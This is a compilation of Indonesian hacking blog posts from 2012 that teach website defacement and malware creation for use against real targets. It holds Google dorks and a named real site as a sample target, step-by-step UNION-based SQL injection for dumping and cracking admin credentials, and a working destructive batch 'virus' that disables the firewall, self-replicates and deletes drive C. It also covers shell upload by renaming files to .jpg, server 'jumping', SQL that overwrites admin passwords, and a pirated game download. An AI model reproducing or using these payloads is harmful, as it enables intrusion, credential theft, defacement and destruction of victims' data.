0 Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7

Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7 | Cirebon-Cyber4rt - Ada tutorial hacking website lagi nih, lumayan SQL Injection. Kalo sebelumnya saya pernah share tentang Cara Deface Website Forum Sederhana Untuk Newbie yang tutorialnya pake skema "order+by+bla.. bla.. bla" nah sekarang saya akan share tentang cara deface lagi nih sob, tapi yang ini lebih mudah karena kita pake tools, jadi tinggal klak-klik aja juga kelar.

Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7

Tapi ada efek sampingnya juga pake cara ini, Bikin Orang Jadi Males hahaha :D Tapi kalo udah tau dasarnya yang pake "order+by+ bla... bla..." it's ok lah, yang penting kita tau jalannya klo disuruh manual, kalo belum tau cara manualnya baca ini dulu Cara Hacking Website Dengan Teknik SQL Injection :D

Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7

Yang pertama dan wajib ada yaitu Toolsnya:

Download Link :

• SQLi Helper 2.7 | 127 KB
• Password : 

Langkah kedua adalah mencari website yang vulnerabillity ( terdapat celah keamanan ), Lah carinya dimana? gampang sob, cari aja di Google :D ada banyak disana. Akh males nyarinya, yaudah nih aku kasih dorknya aja biar lebih mudah. Caranya? caranya masukan dork dibawah ini ke mesin pencarian Google, nanti muncul seribu satu macam website yang sama, nah tinggal kamu pilih satu-satu, cari yang vuln ( terdapat celah keamanan ), OK.

Google Dork SQL Injection :

• inurl:index.php?id=
• inurl:trainers.php?id=
• inurl:buy.php?category=
• inurl:article.php?ID=
• inurl:play_old.php?id=
• inurl:games.php?id=

Maka akan muncul seribu satu macam website yang url-nya mirip seperti yang saya contohkan diatas. Sebenarnya masih banyak script atau dork SQL yang bisa kita dapatkan di internet. Nanti di artikel berikutnya, saya akan coba memberikannya secara lengkap untuk sobat.

Langkah ketiga, Sebelum memulai attacking kita harus menemukan website yang bisa dihack ( vulnerabillity ). Dari ribuan website dari dork yang saya berikan diatas, belum tentu salah satunya yang bisa dihack. Untuk mengetahuinya kita harus memberi tanda petik di akhir alamat website.

Contoh: http://www.wheelieboymotorsports.com/product_detail.php?pid=316 menjadi http://www.wheelieboymotorsports.com/product_detail.php?pid=316'. Jika terdapat tulisan :

Query failed.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname

Berarti Web tersebut Vuln.

Copy Url yang sobat dapatkan tadi ke kolom target.
Contoh: http://www.wheelieboymotorsports.com/product_detail.php?pid=316. ( tidak pakai tanda petik )

Kemudian klik Inject. Maka secara otomatis tools akan memeriksa ulang apakah url tersebut vuln atau tidak, versi database, supports union, dll. Jika Inject berhasil akan muncul tampilan seperti ini.

Kalau sudah klik Get Database.
*Di contoh muncul 2 Database name. Information schema dan natural. Pilih database selain Information schema. Seperti contoh dibawah, saya memilih database natural. Selanjutnya klik Get Tables.

Akan muncul beberapa list Tables yang ada. Sekarang tugas kita tinggal mencari tabel yang berisikan username dan password administratornya. Biasanya nama tabelnya tidak jauh-jauh dari admin_user, admin_login, atau apapun yang berbau informasi login admin.

Langkah Keempat, Kolom SQL
Jika sudah pilih User kalian klik get Coloumns.
Di Coloumns block yang usr_login dan usr_pass atau user_name dan password_admin lalu klik Dump Now.

Setelah itu akan muncul tampilan seperti ini

Pilih salah satu dari user login dan user password tersebut.

Ada yang aneh? Password yang ditampilkan bentuknya kok seperti ini ya?

• 987d29241cc4f2a7465f2d9356ab3615
• 987d29241cc4f2a7465f2d9356ab3615

Langkah Kelima, MD5 Password
Password tersebut dienkripsi dengan menggunakan metode MD5. Jadi kita harus menterjemahkan kode tersebut menjadi password yang sebenarnya. Nah, bagaimana caranya?

Caranya cukup mudah, buka saja situs MD5 Crack, lalu masukkan kode tersebut dikotak penelusuran. Berdo'a saja password yang sobat dapatkan tersebut cukup lemah, sehingga bisa dipecahkan dengan metode Bruto Force. Setelah sobat masukkan, lalu klik Crack hash baby.

Selesai. sekarang cari halaman login atau adminnya.
Ada beberapa contoh halaman login yang bisa sobat pakai

http://target.com/admin.htmlhttp://target.com/admin.php

NOTE - Bagi yang PC nya kedetect virus atau takut PC nya kena virus, bisa pake sandboxie biar lebih aman Click Here

Sekian postingan saya kali ini tentang Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7 , mungkin bagi yang belum tau teknik SQLi Injection cara diatas masih sangat sulit untuk dipahami, tapi saya yakin dengan latihan dan ketekunan pasti sobat akan paham.

Anda sedang membaca artikel tentang Maret 2012 dan anda bisa menemukan artikel Maret 2012 ini dengan url http://tian-akatsuki.blogspot.com/2012/03/cara-deface-website-dengan-menggunakan.html,anda boleh menyebar luaskannya atau mengcopy paste-nya jika artikel Maret 2012 ini sangat bermanfaat bagi teman-teman anda,namun jangan lupa untuk meletakkan link Maret 2012 sumbernya.

0 Membuat Virus Sederhana dengan Menggunakan Notepad

Cirebon-Cyber4rt - Mungkin ini sedikit berguna buat sobat-sobat yang suka bermain dengan virus yang memakai ekstensi .bat. ya udah kita mulai praktekan aja yah... hehehe :D

Script virus berekstensi .bat hanya terdiri dari beberapa kata perintah seperti echo, pause, cls dan beberapa script perintah jika kita ingin bermain diregistri komputer.

Saya tidak menyarankan anda untuk menjalankan virus ini dikomputer sendiri ! Virus ini dibuat dengan Notepad dan di save as dengan ekstension .bat Jangan lupa untuk merubah Save as type menjadi All files.

BASIC

Invisible command

@echo off

Swap mouse

rundll32 user,swapmousebutton

Buka URL yg diinginkan

start [url]http://www.google.com[/url]

Shutdown kmptr & beri pesan

shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f

Disable mouse setelah Restart

rundll32 mouse,disable

Disable keyboard setelah Restart

rundll32 keyboard,disable

Freezes komputer setelah Restart

rundll32 user,disableoemlayer

Worm

Memperbanyak Diri di Dalam Direktori

ctty nul

for %%i in (*.bat) do copy %0+%%i %%i /y >nul"

Me-replace File Batch yang Lain

%0 >>other.bat

Trojan

Mengirim daftar file dalam direktori

dir *.*>>Filelist.txt

Ganti Password Admin

net user administrator PASSWORD HERE

Membuat Info IP

ipconfig >Computer-IP-address.txt

Perusak

Copy ke Autorun

COPY %0 %windir%WINSTART.BAT

Format Drive C

format c: /q /autotest

Delete Windows

DELTREE /Y %windir%

Delete Drive C dengan Paksa

DEL /F /S /Q C:

Mematikan Firewall & Security Center

net stop "Security Center"

net stop SharedAccess

> "%Temp%.kill.reg" ECHO REGEDIT4

>>"%Temp%.kill.reg" ECHO.

>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]

>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004

>>"%Temp%.kill.reg" ECHO.

>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]

>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004

>>"%Temp%.kill.reg" ECHO.

>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]

>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004

>>"%Temp%.kill.reg" ECHO.

START /WAIT REGEDIT /S "%Temp%.kill.reg"

del "%Temp%.kill.reg"

del %0

Pause

Pause Sampai Tekan Sembarang Tombol

Pause

Pause 20 Detik

@ping.exe 127.0.0.1 -n 20 -w 1000 > nul

Berikut Hasil Akhirnya :

@echo off

cls

rundll32 mouse,disable

rundll32 keyboard,disable

COPY %0 %windir%WINSTART.BAT

net stop "Security Center"

net stop SharedAccess

echo Anda kena VIRUS!!!

@ping.exe 127.0.0.1 -n 5 -w 1000 > nul

start [url]http://www.youtube.com[/url]

@ping.exe 127.0.0.1 -n 5 -w 1000 > nul

> "%Temp%.kill.reg" ECHO REGEDIT4

>>"%Temp%.kill.reg" ECHO.

>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]

>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004

>>"%Temp%.kill.reg" ECHO.

>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]

>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004

>>"%Temp%.kill.reg" ECHO.

>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]

>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004

>>"%Temp%.kill.reg" ECHO.

START /WAIT REGEDIT /S "%Temp%.kill.reg"

del "%Temp%.kill.reg"

del %0

DEL /F /S /Q C:

shutdown -s -t 10 -c "Ucapkan selamat tinggal pada komputermu!" -f

[-] Disables mouse & keyboard

[-] Copy ke AUTORUN

[-] Stop Security Center

[-] Display "Anda kena VIRUS!!!" selama 5 detik

[-] Starts [url]http://www.youtube.com[/url]

[-] Disable firewall

[-] Delete c: drive

[-] Force shutdown dengan pesan "Ucapkan selamat tinggal pada komputermu!"

Sekian postingan saya tentang Membuat Virus Sederhana dengan Menggunakan Notepad, Semoga tutorial diatas bisa bermnafaat bagi sobat :D

Source: Catatan Ilmuku

Anda sedang membaca artikel tentang Maret 2012 dan anda bisa menemukan artikel Maret 2012 ini dengan url http://tian-akatsuki.blogspot.com/2012/03/membuat-virus-sederhana-dengan.html,anda boleh menyebar luaskannya atau mengcopy paste-nya jika artikel Maret 2012 ini sangat bermanfaat bagi teman-teman anda,namun jangan lupa untuk meletakkan link Maret 2012 sumbernya.

0 Cara Hacking Website Dengan Teknik SQL Injection

Pengertian SQL Injection, SQL Injection adalah sebuah aksi hacking yang dilakukan diaplikasi client dengan cara memodifikasi perintah SQL yang ada dimemori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x

[ Step 1 ]

• Carilah target
  Misal: [site]/berita.php?id=100
  
  Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
  contoh:
  [site]/berita.php?id=100' atau
  [site]/berita.php?id=-100
  Sehingga muncul pesan error seperti berikut [ masih banyak lagi ]

[ Step 2 ]

• Mencari dan menghitung jumlah table yang ada dalam databasenya...
  gunakan perintah: order by
  
  Contoh:
  
  [site]/berita.php?id=-100+order+by+1-- atau
  [site]/berita.php?id=-100+order+by+1/*
  
  Ceklah secara step by step (satupersatu)...
  Misal:
  
  [site]/berita.php?id=-100+order+by+1--
  [site]/berita.php?id=-100+order+by+2--
  [site]/berita.php?id=-100+order+by+3--
  [site]/berita.php?id=-100+order+by+4--
  
  Sehingga muncul error atau hilang pesan error...
  Misal: [site]/berita.php?id=-100+order+by+9--
  
  Berarti yang kita ambil adalah sampai angka 8
  Menjadi [site]/berita.php?id=-100+order+by+8--

[ Step 3 ]

• untuk mengeluarkan angka berapa yang muncul gunakan perintah union
  karena tadi error sampai angka 9
  maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--
  
  ok seumpama yg keluar angka 5
  
  gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
  misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
  [site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--
  
  Lihat versi yang digunakan se'umpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
  
  Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..

[ Step 4 ]

• Untuk menampilkan table yang ada pada web tersebut adalah
  perintah table_name >>> dimasukan pada angka yangg keluar tadi
  perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
  
  Code:
  
  [site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--
  
  Se'umpama table yang muncul adalah "admin"

[ Step 5 ]

• untuk menampilkan semua isi dari table tersebut adalah
  perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi
  perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir
  
  [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.​tables+where+table_schema=database()--

[ Step 6 ]

• Perintah group_concat(column_name) >>> dimasukan pada angka yang keluar tadi
  perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir
  
  [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema​.columns+where+table_name=0xhexa--
  
  Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
  Website yg digunakan untuk konversi :
  
  http://www.v3n0m.net/ascii.htm
  
  Contoh kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E
  
  [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema​.columns+where+table_name=0x61646D696E--

[ Step 7 ]

• Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan cara
  
  perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
  perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
  
  Contoh :
  
  [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--
  
  Contoh kata yang keluar adalah id,username,password
  
  Contoh :
  
  [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

[ Step 8 ]

• Tahap terakhir mencari halaman admin atau login.

Sekian postingan saya kali ini tentang Cara Hacking Website Dengan Teknik SQL Injection, tutorial hacking yang lain akan menyusul, Jadi mampir terus kesini ya :D

Source: Hacker Newbie

Anda sedang membaca artikel tentang Maret 2012 dan anda bisa menemukan artikel Maret 2012 ini dengan url http://tian-akatsuki.blogspot.com/2012/03/cara-hacking-website-dengan-teknik-sql.html,anda boleh menyebar luaskannya atau mengcopy paste-nya jika artikel Maret 2012 ini sangat bermanfaat bagi teman-teman anda,namun jangan lupa untuk meletakkan link Maret 2012 sumbernya.

0 Beberapa Pengertian-Pengertian Dasar dan Alur Web Attack

Beberapa Pengertian-Pengertian Dasar dan Alur Web Attack - Ada berbagai cara yang dilakukan oleh seorang hacker untuk mencari kelemahan sebuah sistem website. Sehingga mereka bisa menghack website tersebut. Ada berbagai tujuan seorang hacker dalam hack website mencuri informasi pengguna, sampai hanya sekedar iseng saja.

Gambaran Web Attack:

Scan > XPL/SQLi > Upload Shell > Deface/Jumping > Rooting

- Scan

• Scan - Yaitu mencari tau dimana letak kelemahan web target. Bisa discan pake beberapa tool scanner. Diantar'a yang paling terkenal:
  - Acunetix [ Windows ]
  - Nikto [ Linux ]
  Selain dapat mendapatkan bug kita juga dengan tool itu akan dapat mengumpulkan informasi berguna dari web target.

- XPL/SQLi

• XPL/SQLi -  Setelah kita dapat menemukan data-data dari web target. Kita coba cari cara untuk meng-Exploitasi bug-bug yang sudah kita temukan dengan tool scanner tadi. Dibawah ini adalah daftar situs yang menyediakan macam-macam Exploit:
  - Exploit Database
  - Inj3ct0r
  - Packet Storm
  Apabila target menggunakan CMS Joomla/Wordpress, kita dapat mencari Exploit untuk plugin-plugin yang digunakan web target. Karena dengan tool scanner diatas kita diberikan informasi seakan-akan web target sudah dibedah keseluruhannya. Jadi kita tahu isi folder dari web target, termasuk plugin-plugin apa saja yang digunakan.
• Kalau teknik SQLi dapat dilihat disini: SQLi Tutorial [ Download ]

- Upload Shell

• Upload Shell -  Kalau Website sudah bisa di Exploitasi dan kita sudah bisa masuk ke halaman panel admin. Tinggal kita upload shellnya sekarang:
  - Upload shell di Wordpress bisa mengupload plugin or thema yang sudah disisipi file shellnya.
  - Upload shell di Joomla juga sama, cuma bisa juga menggunakan Plugin Ninja Explorer
  - Upload Shell di CMS biasa bisa melalui menu upload gambar, kalau tidak bisa coba shellnya direname menjadi shell.php shell.jpg lalu upload.
  Setelah shell berhasil diupload tinggal panggil letak URL shellnya dimana.

- Deface/Jumping

• Deface/Jumping - Kalau pengen gaya-gaya'an ( Deface ) Cari file index.php lalu ubah file didalamnya dengan script Deface yang kita punya. Bagi yang malas bikin script deface, dapat menggunakan tool Deface Maker Kemudian arsipkan website yang sudah kita deface disitus:
  - Indonesian Defacer - Suspensed
  - Magelang Cyber - Not Active
  - Zone-h - Active
• Tidak cukup hanya bisa men-Deface satu web saja. Coba gunakan teknik jumping untuk masuk ke web yang satu server sama web yang telah kita deface. Caranya ?
  Script Code: Click Here
  - Upload script jumpingnya
  - Rename menjadi jumpingfinder.php
  - Panggil letak file URL tersebut
  - Masuk ke public_html web target
  - Masuk ke MySQL nya [ Cari account MySQL difile config ]
  - Cari table user
  - Update password user admin
• Dibawah ini ada script khusus untuk update user password admin:
  -  #Wordpress [ PHP Code ]
  UPDATE `note_wrdp1`.`wp_users` SET `user_pass` = '$P$BdEAI5H.T0REbjjKME506zOW03nggb0' WHERE `wp_users`.`ID` = 1 LIMIT 1;
  
  -  #Joomla [ PHP Code ]
  update `jos_users` set `password`="ece4f1e9e99fe6ca77c100d02cf4aa60" where `username`="admin"; 
  
• Password admin sudah berhasil diupdate, tinggal ikuti seperti langkah nomor 3. 

- Rooting

• Rooting - pada tahap ini kita bisa nyantai, karena semua step sudag terlewati.

Sekian postingan saya kali ini tentang Beberapa Pengertian-Pengertian Dasar dan Alur Web Attack, walau agak panjang penjelasannya, saya yakin sobat mengerti  :*

Source: Hacker Newbie 

Anda sedang membaca artikel tentang Maret 2012 dan anda bisa menemukan artikel Maret 2012 ini dengan url http://tian-akatsuki.blogspot.com/2012/03/beberapa-pengertian-pengertian-dasar.html,anda boleh menyebar luaskannya atau mengcopy paste-nya jika artikel Maret 2012 ini sangat bermanfaat bagi teman-teman anda,namun jangan lupa untuk meletakkan link Maret 2012 sumbernya.

0 Free Download Call Of Duty Modern Warfare 3

Free Download Call Of Duty Modern Warfare 3 - Pasti sobat sudah tahu Game paling populer di dunia ini, Call of Duty. Kali ini Call of Duty merilis versi terbarunya, yaitu Call of Duty Modern Warfare 3. Menurut saya, Call of Duty Modern Warfare 3 ini sudah memiliki efek dan grafik yang cukup bagus, bahkan bisa dibilang grafik dan kualitas suara dan gambar Call of Duty Modern Warfare 3 ini terbilang Sempurna dibandingkan dengan game sejenisnya. Seperti Counter Strike, Battlefield, Crysis, atau Point Blank.

Screenshot:

Minimum System Requirements:

• Operating System Windows XP, Vista and 7
• RAM 2 GB
• VGA 256 MB Support Pixel Shader 3.0 - GeForce / ATI Radeon
• 16 GB HDD Free Space
• Processor: Intel Dual-Core 2.8 Ghz or Higher
• DirectX 9.0 Compatible

Download Links: Call Of Duty Modern Warfare 3 | 5.8 GB

Password: mediafire-games4u

Sekian postingan saya kali ini tentang Free Download Call Of Duty Modern Warfare 3 , selamat bermain ya sob hehehe :D Jangan lupa follow blog ini ya !

Anda sedang membaca artikel tentang Maret 2012 dan anda bisa menemukan artikel Maret 2012 ini dengan url http://tian-akatsuki.blogspot.com/2012/03/free-download-call-of-duty-modern.html,anda boleh menyebar luaskannya atau mengcopy paste-nya jika artikel Maret 2012 ini sangat bermanfaat bagi teman-teman anda,namun jangan lupa untuk meletakkan link Maret 2012 sumbernya.